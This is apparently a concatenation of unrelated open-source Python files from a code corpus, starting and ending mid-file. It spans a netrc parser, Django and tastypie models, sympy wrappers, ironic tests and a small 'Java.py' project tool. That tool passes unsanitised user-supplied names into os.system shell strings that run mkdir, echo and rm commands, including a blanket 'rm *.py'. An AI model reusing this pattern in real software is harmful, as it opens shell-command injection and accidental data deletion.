self.store.UnlockSubject(self.subject, self.transid, self.token)
self.locked = False
| destijl/grr | grr/lib/data_stores/http_data_store.py | Python | apache-2.0 | 29,623 |
# -*- coding: utf-8 -*-
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class product(osv.osv):
_inherit = "product.product"
def get_product_available(self, cr, uid, ids, context=None):
""" Finds whether product is available or not in a particular warehouse.
@return: Dictionary of values
"""
bom_pool = self.pool.get("mrp.bom")
res = super(product, self).get_product_available(cr, uid, ids, context=context)
if 'done' not in context.get('states', []) or 'in' not in context.get('what', []):
return res
boms = bom_pool.browse(cr, uid, bom_pool.search(cr, uid, [('product_id', 'in', res.keys())]))
for bom in boms:
if not bom.bom_lines:
continue
quantities = []
for l in bom.bom_lines:
if not l.product_qty:
quantities.append(0)
break
quantities.append(
(res[l.product_id.id] if l.product_id.id in res else l.product_id.qty_available) / l.product_qty)
res[bom.product_id.id] += min(quantities)
return res
product() | ryepdx/kit_sale | product.py | Python | agpl-3.0 | 1,279 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-16 14:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
],
options={
'verbose_name': 'Student',
'verbose_name_plural': 'Students',
},
),
migrations.CreateModel(
name='University',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
options={
'verbose_name': 'University',
'verbose_name_plural': 'Universities',
},
),
migrations.AddField(
model_name='student',
name='university',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.University'),
),
]
| tiagoprn/experiments | django/drf_swagger/project/apps/core/migrations/0001_initial.py | Python | mit | 1,415 |
import hmac
import time
from django.conf import settings
from django.db import models
from tastypie.utils import now
try:
from hashlib import sha1
except ImportError:
import sha
sha1 = sha.sha
class ApiAccess(models.Model):
"""A simple model for use with the ``CacheDBThrottle`` behaviors."""
identifier = models.CharField(max_length=255)
url = models.CharField(max_length=255, blank=True, default='')
request_method = models.CharField(max_length=10, blank=True, default='')
accessed = models.PositiveIntegerField()
def __unicode__(self):
return u"%s @ %s" % (self.identifier, self.accessed)
def save(self, *args, **kwargs):
self.accessed = int(time.time())
return super(ApiAccess, self).save(*args, **kwargs)
if 'django.contrib.auth' in settings.INSTALLED_APPS:
import uuid
from tastypie.compat import AUTH_USER_MODEL
class ApiKey(models.Model):
user = models.OneToOneField(AUTH_USER_MODEL, related_name='api_key')
key = models.CharField(max_length=256, blank=True, default='', db_index=True)
created = models.DateTimeField(default=now)
def __unicode__(self):
return u"%s for %s" % (self.key, self.user)
def save(self, *args, **kwargs):
if not self.key:
self.key = self.generate_key()
return super(ApiKey, self).save(*args, **kwargs)
def generate_key(self):
# Get a random UUID.
new_uuid = uuid.uuid4()
# Hmac that beast.
return hmac.new(str(new_uuid), digestmod=sha1).hexdigest()
class Meta:
abstract = getattr(settings, 'TASTYPIE_ABSTRACT_APIKEY', False)
def create_api_key(sender, **kwargs):
"""
A signal for hooking up automatic ``ApiKey`` creation.
"""
if kwargs.get('created') is True:
ApiKey.objects.create(user=kwargs.get('instance'))
| rtucker-mozilla/WhistlePig | vendor-local/lib/python/tastypie/models.py | Python | bsd-3-clause | 1,994 |
from polynomial import Poly
def LexPoly(*args):
"""Returns a polynomial with lexicographic order of terms. """
return Poly(*args, **{ 'order' : 'lex' })
from algorithms import poly_div, poly_pdiv, poly_groebner, poly_lcm, poly_gcd, \
poly_half_gcdex, poly_gcdex, poly_sqf, poly_resultant, poly_subresultants, \
poly_decompose, poly_quo, poly_rem, poly_pquo, poly_prem
from rootfinding import poly_root_factors, poly_sturm
def _conv_args(n, args):
symbols = args[n:]
if len(symbols) == 1 and isinstance(symbols[0], (tuple, list)):
return args[:n] + tuple(symbols[0])
else:
return args
def _map_basic(f, n, *args, **kwargs):
result = f(*_conv_args(n, args), **kwargs)
if isinstance(result, (list, tuple, set)):
return result.__class__(g.as_basic() for g in result)
else:
return result.as_basic()
_funcs = {
'quo' : 2,
'rem' : 2,
'pdiv' : 2,
'pquo' : 2,
'prem' : 2,
'groebner' : 1,
'lcm' : 2,
'gcd' : 2,
'gcdex' : 2,
'half_gcdex' : 2,
'resultant' : 2,
'sqf' : 1,
'decompose' : 1,
'root_factors' : 1,
'sturm' : 1,
}
_func_def = \
"""
def %s(*args, **kwargs):
return _map_basic(poly_%s, %d, *args, **kwargs)
%s.__doc__ = poly_%s.__doc__
"""
for _func, _n in _funcs.iteritems():
exec _func_def % (_func, _func, _n, _func, _func)
def div(*args, **kwargs):
q, r = poly_div(*_conv_args(2, args), **kwargs)
if type(q) is not list:
q = q.as_basic()
else:
q = [ p.as_basic() for p in q ]
return q, r.as_basic()
div.__doc__ = poly_div.__doc__
def subresultants(*args, **kwargs):
result = poly_subresultants(*_conv_args(2, args), **kwargs)
if type(result) is tuple:
res, R = result
else:
res, R = None, result
R = [ r.as_basic() for r in R ]
if res is None:
return R
else:
return res.as_basic(), R
subresultants.__doc__ = poly_subresultants.__doc__
| ryanGT/sympy | sympy/polys/wrappers.py | Python | bsd-3-clause | 2,095 |
#!/usr/bin/python3
from sys import argv, dont_write_bytecode
from os import listdir, system, getcwd, path
from re import findall
from json import loads, dumps
dont_write_bytecode = True
def runProject():
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
translateCode(getcwd()+"/"+data["name"]+".jpy", data["name"])
for name in data["classes"]:
translateCode(getcwd()+"/"+name+".jpy")
system("python3 -B "+getcwd()+"/"+data["name"]+".py")
def translateCode(filePath, main=False):
openFile = open(filePath)
code = openFile.read()
openFile.close()
for arr in findall(r"class (.*):", code):
code = code.replace("def %s("%arr, "def __init__(")
if main != False:
code = autoImportClasses()+code
code = "from sys import argv\n"+code+"\nif __name__ == \"__main__\": %s().main(argv)" % main
createPythonFile(filePath, code)
def autoImportClasses():
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
imports = "\n"
for cls in data["classes"]:
fcls = filterPathToClass(cls)
imports+="from %s import %s\n"%(fcls[1],fcls[0])
imports+="\n"
return imports
def filterPathToClass(path):
fullPath = path
path = path.split("/")
result = ".".join(path)
if len(path) == 1:
fullPath = path[0]
elif len(path) > 1:
fullPath = path[-1]
return [fullPath, result]
def createPythonFile(filePath, code):
createFile = open(filePath[0:-3]+"py", "w")
createFile.write(code)
createFile.close()
def createProject(name):
if len(name) < 2:
print("Bad project name!")
return False
if path.isdir(getcwd()+"/.jpy"):
print("Project is created!")
return False
system("cd %s && mkdir .jpy && cd .jpy && echo '{\"name\": \"%s\",\"classes\":[]}' > data.json" % (getcwd(), name))
if not path.isfile(getcwd()+"/"+name+".jpy"):
system("cd %s && echo 'class %s:\n\tdef main(self,args):\n\t\tprint(\"Hello world!\")' > %s.jpy" % (getcwd(), name, name))
print("Project '%s' created!" % name)
def removeProject():
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
system("cd %s && rm .jpy/* && rmdir .jpy && rm *.py" % getcwd())
if path.isdir(getcwd()+"/__pycache__"):
system("cd %s && rm __pycache__/* && rmdir __pycache__" % getcwd())
print("Project removed!")
def createClass(name):
if len(name) < 2:
print("Bad project name!")
return False
if not path.isdir(getcwd()+"/.jpy"):
print("Project not defined!")
return False
fullName = name
name = name.split("/")
if len(name) == 1:
name = name[0]
elif len(name) > 1:
name = name[-1]
if not path.isfile(getcwd()+"/"+name+".jpy"):
createClass = open(getcwd()+"/"+fullName+".jpy","w")
createClass.write('class %s:\n\tdef %s(self):\n\t\tprint(\"Hello module!\")'%(name,name))
createClass.close()
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
data["classes"].append(fullName)
updateData = open(getcwd()+"/.jpy/data.json","w")
updateData.write(dumps(data, indent=4))
updateData.close()
print("Class created!")
def removeClass(name):
if len(name) < 2:
print("Bad class name!")
return False
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
if not path.isfile(getcwd()+"/"+name+".jpy"):
print("Class not found!")
return False
openData = open(getcwd()+"/.jpy/data.json")
data = loads(openData.read())
openData.close()
del(data[data.index(name)])
updateData = open(getcwd()+"/.jpy/data.json", "w")
updateData.write(dumps(data, indent=4))
updateData.close()
def createPackage(name):
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
if path.isdir(getcwd()+"/"+name):
print("Package is created!")
return False
system("cd %s && mkdir %s && cd %s && echo '#init file'> __init__.py" % (getcwd(), name, name))
print("Project created!")
def removePackage(name):
if not path.isdir(getcwd()+"/.jpy"):
print("Project not found!")
return False
if not path.isdir(getcwd()+"/"+name):
print("Package is created!")
return False
try:
system("cd %s && rmdir %s" % (getcwd(), name))
except:
system("cd %s && rm -i %s/* && rmdir %s" % (getcwd(), name, name))
print("Project removed!")
homeCmd = """Java.py v0.0.1(Apha) linux version.
--help - to get help information
Author: Roman Naumenko-Vahnitsky"""
helpCmd = """--init <name> - create project, <name> - name project
--run - run you project
--create class <class_name> - create new class/file
--create package <package_name> - create new package folder
--remove class <class_name> - remove class/file
--remove package <package_name> - remove package folder
--remove project <project_name> - remove project (.jpy files won't delete)"""
if len(argv) >= 2:
if argv[1] == "--init":
try:
createProject(argv[2])
except Exception as e:
print("--init ERROR!\n",e)
elif argv[1] == "--run":
try:
runProject()
except Exception as e:
print("--run ERROR!\n",e)
elif argv[1] == "--create":
try:
if argv[2] == "class":
createClass(argv[3])
if argv[2] == "package":
createPackage(argv[3])
except Exception as e:
print("--create ERROR!\n",e)
elif argv[1] == "--remove":
try:
if argv[2] == "project":
removeProject()
elif argv[2] == "class":
removeClass(argv[3])
elif argv[2] == "package":
removePackage(argv[3])
except Exception as e:
print("--remove ERROR!\n",e)
elif argv[1] == "--help":
print(helpCmd)
else:
print("This unknown me command")
else:
print(homeCmd) | nauma/Java.py | .java.py/main.py | Python | gpl-2.0 | 5,912 |
# Copyright 2015 Hewlett Packard Development Company, LP
# Copyright 2015 Universidade Federal de Campina Grande
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils import importutils
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.drivers.modules.oneview import common
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
oneview_states = importutils.try_import('oneview_client.states')
class OneViewCommonTestCase(db_base.DbTestCase):
def setUp(self):
super(OneViewCommonTestCase, self).setUp()
self.node = obj_utils.create_test_node(
self.context, driver='fake_oneview',
properties=db_utils.get_test_oneview_properties(),
driver_info=db_utils.get_test_oneview_driver_info(),
)
self.config(manager_url='https://1.2.3.4', group='oneview')
self.config(username='user', group='oneview')
self.config(password='password', group='oneview')
mgr_utils.mock_the_extension_manager(driver="fake_oneview")
def test_verify_node_info(self):
common.verify_node_info(self.node)
def test_verify_node_info_missing_node_properties(self):
self.node.properties = {
"cpu_arch": "x86_64",
"cpus": "8",
"local_gb": "10",
"memory_mb": "4096",
"capabilities": ("enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri")
}
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_type_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_node_driver_info(self):
self.node.driver_info = {}
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_spt(self):
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = ("server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri")
self.node.properties = properties
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_profile_template_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_sh(self):
driver_info = db_utils.get_test_oneview_driver_info()
del driver_info["server_hardware_uri"]
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = (
"server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri"
)
self.node.properties = properties
self.node.driver_info = driver_info
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_uri"):
common.verify_node_info(self.node)
def test_verify_node_info_missing_sht(self):
driver_info = db_utils.get_test_oneview_driver_info()
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = (
"enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri"
)
self.node.properties = properties
self.node.driver_info = driver_info
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_type_uri"):
common.verify_node_info(self.node)
def test_get_oneview_info(self):
complete_node = self.node
expected_node_info = {
'server_hardware_uri': 'fake_sh_uri',
'server_hardware_type_uri': 'fake_sht_uri',
'enclosure_group_uri': 'fake_eg_uri',
'server_profile_template_uri': 'fake_spt_uri',
'applied_server_profile_uri': None,
}
self.assertEqual(
expected_node_info,
common.get_oneview_info(complete_node)
)
def test_get_oneview_info_missing_spt(self):
driver_info = db_utils.get_test_oneview_driver_info()
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = ("server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri")
self.node.driver_info = driver_info
self.node.properties = properties
incomplete_node = self.node
expected_node_info = {
'server_hardware_uri': 'fake_sh_uri',
'server_hardware_type_uri': 'fake_sht_uri',
'enclosure_group_uri': 'fake_eg_uri',
'server_profile_template_uri': None,
'applied_server_profile_uri': None,
}
self.assertEqual(
expected_node_info,
common.get_oneview_info(incomplete_node)
)
def test_get_oneview_info_missing_sh(self):
driver_info = db_utils.get_test_oneview_driver_info()
del driver_info["server_hardware_uri"]
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = (
"server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri"
)
self.node.driver_info = driver_info
self.node.properties = properties
incomplete_node = self.node
expected_node_info = {
'server_hardware_uri': None,
'server_hardware_type_uri': 'fake_sht_uri',
'enclosure_group_uri': 'fake_eg_uri',
'server_profile_template_uri': 'fake_spt_uri',
'applied_server_profile_uri': None,
}
self.assertEqual(
expected_node_info,
common.get_oneview_info(incomplete_node)
)
def test_get_oneview_info_malformed_capabilities(self):
driver_info = db_utils.get_test_oneview_driver_info()
del driver_info["server_hardware_uri"]
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = "anything,000"
self.node.driver_info = driver_info
self.node.properties = properties
self.assertRaises(exception.OneViewInvalidNodeParameter,
common.get_oneview_info,
self.node)
def test__verify_node_info(self):
common._verify_node_info("properties",
{"a": True,
"b": False,
"c": 0,
"d": "something",
"e": "somethingelse"},
["a", "b", "c", "e"])
def test__verify_node_info_fails(self):
self.assertRaises(
exception.MissingParameterValue,
common._verify_node_info,
"properties",
{"a": 1, "b": 2, "c": 3},
["x"]
)
def test__verify_node_info_missing_values_empty_string(self):
with self.assertRaisesRegex(exception.MissingParameterValue,
"'properties:a', 'properties:b'"):
common._verify_node_info("properties",
{"a": '', "b": None, "c": "something"},
["a", "b", "c"])
def _test_translate_oneview_states(self, power_state_to_translate,
expected_translated_power_state):
translated_power_state = common.translate_oneview_power_state(
power_state_to_translate)
self.assertEqual(translated_power_state,
expected_translated_power_state)
def test_all_scenarios_for_translate_oneview_states(self):
self._test_translate_oneview_states(
oneview_states.ONEVIEW_POWERING_OFF, states.POWER_ON)
self._test_translate_oneview_states(
oneview_states.ONEVIEW_POWER_OFF, states.POWER_OFF)
self._test_translate_oneview_states(
oneview_states.ONEVIEW_POWERING_ON, states.POWER_OFF)
self._test_translate_oneview_states(
oneview_states.ONEVIEW_RESETTING, states.REBOOT)
self._test_translate_oneview_states("anything", states.ERROR)
@mock.patch.object(common, 'get_oneview_client', spec_set=True,
autospec=True)
def test_validate_oneview_resources_compatibility(
self, mock_get_ov_client
):
oneview_client = mock_get_ov_client()
with task_manager.acquire(self.context, self.node.uuid) as task:
common.validate_oneview_resources_compatibility(oneview_client,
task)
self.assertTrue(
oneview_client.validate_node_server_hardware.called)
self.assertTrue(
oneview_client.validate_node_server_hardware_type.called)
self.assertTrue(
oneview_client.validate_node_enclosure_group.called)
self.assertTrue(
oneview_client.validate_node_server_profile_template.called)
self.assertTrue(
oneview_client.check_server_profile_is_applied.called)
self.assertTrue(
oneview_client.
is_node_port_mac_compatible_with_server_profile.called)
self.assertFalse(
oneview_client.
is_node_port_mac_compatible_with_server_hardware.called)
self.assertFalse(
oneview_client.validate_spt_primary_boot_connection.called)
self.assertFalse(
oneview_client.
validate_server_profile_template_mac_type.called)
@mock.patch.object(common, 'get_oneview_client', spec_set=True,
autospec=True)
def test_validate_oneview_resources_compatibility_dynamic_allocation(
self, mock_get_ov_client
):
"""Validate compatibility of resources for Dynamic Allocation model.
1) Set 'dynamic_allocation' flag as True on node's driver_info
2) Check validate_node_server_profile_template method is called
3) Check validate_node_server_hardware_type method is called
4) Check validate_node_enclosure_group method is called
5) Check validate_node_server_hardware method is called
6) Check is_node_port_mac_compatible_with_server_hardware method
is called
7) Check validate_server_profile_template_mac_type method is called
8) Check check_server_profile_is_applied method is not called
9) Check is_node_port_mac_compatible_with_server_profile method is
not called
"""
oneview_client = mock_get_ov_client()
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = True
task.node.driver_info = driver_info
common.validate_oneview_resources_compatibility(oneview_client,
task)
self.assertTrue(
oneview_client.validate_node_server_profile_template.called)
self.assertTrue(
oneview_client.validate_node_server_hardware_type.called)
self.assertTrue(
oneview_client.validate_node_enclosure_group.called)
self.assertTrue(
oneview_client.validate_node_server_hardware.called)
self.assertTrue(
oneview_client.
is_node_port_mac_compatible_with_server_hardware.called)
self.assertTrue(
oneview_client.
validate_server_profile_template_mac_type.called)
self.assertFalse(
oneview_client.check_server_profile_is_applied.called)
self.assertFalse(
oneview_client.
is_node_port_mac_compatible_with_server_profile.called)
def test_is_dynamic_allocation_enabled_boolean(self):
"""Ensure Dynamic Allocation is enabled when flag is True.
1) Set 'dynamic_allocation' flag as True on node's driver_info
2) Check Dynamic Allocation is enabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = True
task.node.driver_info = driver_info
self.assertTrue(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_string(self):
"""Ensure Dynamic Allocation is enabled when flag is 'True'.
1) Set 'dynamic_allocation' flag as True on node's driver_info
2) Check Dynamic Allocation is enabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = 'True'
task.node.driver_info = driver_info
self.assertTrue(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_false_boolean(self):
"""Ensure Dynamic Allocation is disabled when flag is False.
1) Set 'dynamic_allocation' flag as False on node's driver_info
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = False
task.node.driver_info = driver_info
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_false_string(self):
"""Ensure Dynamic Allocation is disabled when flag is 'False'.
1) Set 'dynamic_allocation' flag as False on node's driver_info
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = 'False'
task.node.driver_info = driver_info
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_none_object(self):
"""Ensure Dynamic Allocation is disabled when flag is None.
1) Set 'dynamic_allocation' flag as None on node's driver_info
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = None
task.node.driver_info = driver_info
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_without_flag(self):
"""Ensure Dynamic Allocation is disabled when node doesn't have flag.
1) Create a node without 'dynamic_allocation' flag
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_with_invalid_value_for_flag(self):
"""Ensure raises an InvalidParameterValue when flag is invalid.
1) Create a node with an invalid value for 'dynamic_allocation' flag
2) Check if method raises an InvalidParameterValue for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = 'invalid flag'
task.node.driver_info = driver_info
self.assertRaises(
exception.InvalidParameterValue,
common.is_dynamic_allocation_enabled,
task.node
)
| NaohiroTamura/ironic | ironic/tests/unit/drivers/modules/oneview/test_common.py | Python | apache-2.0 | 17,276 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class ConflictParent(Package):
homepage = 'https://github.com/tgamblin/callpath'
url = 'http://github.com/tgamblin/callpath-1.0.tar.gz'
version(0.8, 'foobarbaz')
version(0.9, 'foobarbaz')
version(1.0, 'foobarbaz')
depends_on('conflict')
conflicts('^conflict~foo', when='@0.9')
def install(self, spec, prefix):
configure("--prefix=%s" % prefix)
make()
make("install")
def setup_environment(self, senv, renv):
renv.set('FOOBAR', self.name)
| iulian787/spack | var/spack/repos/builtin.mock/packages/conflict-parent/package.py | Python | lgpl-2.1 | 731 |
from pyblish import api
from pyblish_bumpybox import inventory
class ValidateGroupNode(api.InstancePlugin):
"""Validates group node.
Ensures none of the groups content is locally stored.
"""
order = inventory.get_order(__file__, "ValidateGroupNode")
optional = True
families = ["gizmo", "lut"]
label = "Group Node"
hosts = ["nuke", "nukeassist"]
def process(self, instance):
import os
for node in instance[0].nodes():
# Skip input and output nodes
if node.Class() in ["Input", "Output"]:
continue
# Get file path
file_path = ""
if node.Class() == "Vectorfield":
file_path = node["vfield_file"].getValue()
if node.Class() == "Read":
file_path = node["file"].getValue()
# Validate file path to not be local
# Windows specifc
msg = "Node \"{0}\" in group \"{1}\"".format(
node["name"].getValue(), instance[0]["name"].getValue()
)
msg += ", has a local file path: \"{0}\"".format(file_path)
assert "c:" != os.path.splitdrive(file_path)[0].lower(), msg
| Bumpybox/pyblish-bumpybox | pyblish_bumpybox/plugins/nuke/validate_group_node.py | Python | lgpl-3.0 | 1,217 |
# unpack sequences
a, = 1, ; print(a)
a, b = 2, 3 ; print(a, b)
a, b, c = 1, 2, 3; print(a, b, c)
a, = range(1); print(a)
a, b = range(2); print(a, b)
a, b, c = range(3); print(a, b, c)
(a) = range(1); print(a)
(a,) = range(1); print(a)
(a, b) = range(2); print(a, b)
(a, b, c) = range(3); print(a, b, c)
(a, (b, c)) = [-1, range(2)]; print(a, b, c)
# lists
[] = []
[a] = range(1); print(a)
[a, b] = range(2); print(a, b)
[a, b, c] = range(3); print(a, b, c)
# with star
*a, = () ; print(a)
*a, = 4, ; print(a)
*a, = 5, 6 ; print(a)
*a, b = 7, ; print(a, b)
*a, b = 8, 9 ; print(a, b)
*a, b = 10, 11, 12 ; print(a, b)
a, *b = 13, ; print(a, b)
a, *b = 14, 15 ; print(a, b)
a, *b = 16, 17, 18 ; print(a, b)
a, *b, c = 19, 20 ; print(a, b)
a, *b, c = 21, 22, 23 ; print(a, b)
a, *b, c = 24, 25, 26, 27 ; print(a, b)
a = [28, 29]
*b, = a
print(a, b, a == b)
[*a] = [1, 2, 3]
print(a)
try:
a, *b, c = (30,)
except ValueError:
print("ValueError")
# with star and generic iterator
*a, = range(5) ; print(a)
*a, b = range(5) ; print(a, b)
*a, b, c = range(5) ; print(a, b, c)
a, *b = range(5) ; print(a, b)
a, *b, c = range(5) ; print(a, b, c)
a, *b, c, d = range(5) ; print(a, b, c, d)
a, b, *c = range(5) ; print(a, b, c)
a, b, *c, d = range(5) ; print(a, b, c, d)
a, b, *c, d, e = range(5) ; print(a, b, c, d, e)
*a, = [x * 2 for x in [1, 2, 3, 4]] ; print(a)
*a, b = [x * 2 for x in [1, 2, 3, 4]] ; print(a, b)
a, *b = [x * 2 for x in [1, 2, 3, 4]] ; print(a, b)
a, *b, c = [x * 2 for x in [1, 2, 3, 4]]; print(a, b, c)
try:
a, *b, c = range(0)
except ValueError:
print("ValueError")
try:
a, *b, c = range(1)
except ValueError:
print("ValueError")
| mhoffma/micropython | tests/basics/unpack1.py | Python | mit | 1,794 |
"""An object-oriented interface to .netrc files."""
# Module and documentation by Eric S. Raymond, 21 Dec 1998
import os, shlex, stat
__all__ = ["netrc", "NetrcParseError"]
class NetrcParseError(Exception):
"""Exception raised on syntax errors in the .netrc file."""
def __init__(self, msg, filename=None, lineno=None):
self.filename = filename
self.lineno = lineno
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)
class netrc:
def __init__(self, file=None):
default_netrc = file is None
if file is None:
try:
file = os.path.join(os.environ['HOME'], ".netrc")
except KeyError:
raise OSError("Could not find .netrc: $HOME is not set")
self.hosts = {}
self.macros = {}
with open(file) as fp:
self._parse(file, fp, default_netrc)
def _parse(self, file, fp, default_netrc):
lexer = shlex.shlex(fp)
lexer.wordchars += r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
lexer.commenters = lexer.commenters.replace('#', '')
while 1:
# Look for a machine, default, or macdef top-level keyword
saved_lineno = lexer.lineno
toplevel = tt = lexer.get_token()
if not tt:
break
elif tt[0] == '#':
if lexer.lineno == saved_lineno and len(tt) == 1:
lexer.instream.readline()
continue
elif tt == 'machine':
entryname = lexer.get_token()
elif tt == 'default':
entryname = 'default'
elif tt == 'macdef': # Just skip to end of macdefs
entryname = lexer.get_token()
self.macros[entryname] = []
lexer.whitespace = ' \t'
while 1:
line = lexer.instream.readline()
if not line or line == '\012':
lexer.whitespace = ' \t\r\n'
break
self.macros[entryname].append(line)
continue
else:
raise NetrcParseError(
"bad toplevel token %r" % tt, file, lexer.lineno)
# We're looking at start of an entry for a named machine or default.
login = ''
account = password = None
self.hosts[entryname] = {}
while 1:
tt = lexer.get_token()
if (tt.startswith('#') or
tt in {'', 'machine', 'default', 'macdef'}):
if password:
self.hosts[entryname] = (login, account, password)
lexer.push_token(tt)
break
else:
raise NetrcParseError(
"malformed %s entry %s terminated by %s"
% (toplevel, entryname, repr(tt)),
file, lexer.lineno)
elif tt == 'login' or tt == 'user':
login = lexer.get_token()
elif tt == 'account':
account = lexer.get_token()
elif tt == 'password':
if os.name == 'posix' and default_netrc:
prop = os.fstat(fp.fileno())
if prop.st_uid != os.getuid():
import pwd
try:
fowner = pwd.getpwuid(prop.st_uid)[0]
except KeyError:
fowner = 'uid %s' % prop.st_uid
try:
user = pwd.getpwuid(os.getuid())[0]
except KeyError:
user = 'uid %s' % os.getuid()
raise NetrcParseError(
("~/.netrc file owner (%s) does not match"
" current user (%s)") % (fowner, user),
file, lexer.lineno)
if (prop.st_mode & (stat.S_IRWXG | stat.S_IRWXO)):
raise NetrcParseError(
"~/.netrc access too permissive: access"
" permissions must restrict access to only"
" the owner", file, lexer.lineno)
password = lexer.get_token()
else:
raise NetrcParseError("bad follower token %r" % tt,
file, lexer.lineno)
def authenticators(self, host):
"""Return a (user, account, password) tuple for given host."""
if host in self.hosts:
return self.hosts[host]
elif 'default' in self.hosts:
return self.hosts['default']
else:
return None
def __repr__(self):
"""Dump the class data in the format of a .netrc file."""
rep = ""
for host in self.hosts.keys():
attrs = self.hosts[host]
rep = rep + "machine "+ host + "\n\tlogin " + repr(attrs[0]) + "\n"
if attrs[1]:
rep = rep + "account " + repr(attrs[1])
rep = rep + "\tpassword " + repr(attrs[2]) + "\n"
for macro in self.macros.keys():
rep = rep + "macdef " + macro + "\n"
for line in self.macros[macro]:
rep = rep + line
rep = rep + "\n"
return rep
if __name__ == '__main__':
print(netrc())
| Orav/kbengine | kbe/src/lib/python/Lib/netrc.py | Python | lgpl-3.0 | 5,890 |
# Download the Python helper library from twilio.com/docs/python/install
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
account_sid = "ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
auth_token = "your_auth_token"
client = Client(account_sid, auth_token)
map_instance = client.sync \
.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.sync_maps("Players") \
.fetch()
print(map_instance.sid)
| teoreteetik/api-snippets | sync/rest/maps/retrieve-map/retrieve-map.6.x.py | Python | mit | 441 |
#!/usr/bin/env python
import argparse
import codecs
import logging
from collections import Counter
import unicodecsv as csv
import epitran
import epitran.flite
import panphon
logger = logging.getLogger('epitran')
def normpunc(flite, s):
def norm(c):
if c in flite.puncnorm:
return flite.puncnorm[c]
else:
return c
